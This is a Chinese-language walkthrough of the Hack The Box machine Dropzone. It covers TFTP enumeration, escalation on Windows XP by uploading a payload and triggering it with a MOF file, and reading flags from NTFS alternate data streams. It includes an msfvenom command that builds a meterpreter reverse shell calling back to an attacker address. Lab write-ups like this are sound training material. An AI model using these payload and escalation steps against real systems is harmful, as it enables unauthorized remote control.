[go: up one dir, main page]

Skip to content

Latest commit

 

History

History
156 lines (74 loc) · 7.38 KB

HackTheBox-windows-Dropzone.md

File metadata and controls

156 lines (74 loc) · 7.38 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

大余安全  

一个每日分享渗透小技巧的公众号

大家好,这里是 大余安全 的第 75 篇文章,本公众号会每日分享攻防渗透技术给大家。

靶机地址:https://www.hackthebox.eu/home/machines/profile/139

靶机难度:中级(5.0/10)

靶机发布日期:2018 年 11 月 4 日

靶机描述:

Dropzone is an interesting machine that highlights a technique used by the Stuxnet worm. The discovery of NTFS data streams provides an additional challenge.

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

可以看到靶机的 IP 是 10.10.10.90....

可以看到,不存在 TCP 服务... 看看 UDP

nmap 发现了 69 的 tftp 服务开放着...

竟然只开放了 tftp 服务,这里可以进行查询命令帮助... 开始找问题收集信息...

这里尝试下载,发现权限是开放着,是名称打错的原因?试试...

直接尝试下载 boot.ini 这是 windows 系统运行参数的文件... 可以看到这是 windows xp 系统...

XP 系统,这里可以开始提权了...GO

二、提权

方法 1:

这里利用 MSF 进行提权...

git clone https://github.com/Sayantan5/Dropzone
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.11 lport=443 -f exe > dayu.exe

这里利用 msfvenom 生成. exe 的 shellcode... 然后利用 hack.mof 触发 shellcode... 这里. mof 是某位大神利用 wbemexec.rb 编码写的...

前提要将 Mode 模式转换成 octet...

然后上传 dayu.exe,成功上传...

可以看到直接提权成功... 这是 5.0 的分值的靶机... 这么容易?????

我觉得没这么容易,不给下载... 进去看看...

果然...It's easy, but not THAT easy...

这里真的恶心...10~1 分钟不等之间会自动退出 shell... 不稳定...

还好我用了 MSF 进行监听...

这里可以发现一个 flags 下的. txt 文本...

再次尝试查看,制动关闭的 shellcode....

这里需要利用 Streams 查看数据信息流...

利用 tftp 上传... 我快吐了...HTBwindows 服务器最近很卡很卡... 可以看到我上传了 527 秒...

等了这么久我竟然没想到利用 smbserver 开启 smb 共享,然后在靶机里 \10.10.14.11... 下载 streams.exe... 可能太累了...

成功读取数据流获得了 root/user 信息...

太卡了,可能是 HTB 的 windows 服务器问题,也有人反馈了说很卡...

还有就是只开放一个端口,有时候会有别的玩家进来和我在同一个屋檐下... 不冲突都难...

由于我们已经成功得到 root 权限查看 user.txt 和 root.txt,因此完成了靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

随缘收徒中~~ 随缘收徒中~~ 随缘收徒中~~

欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

大余安全

一个全栈渗透小技巧的公众号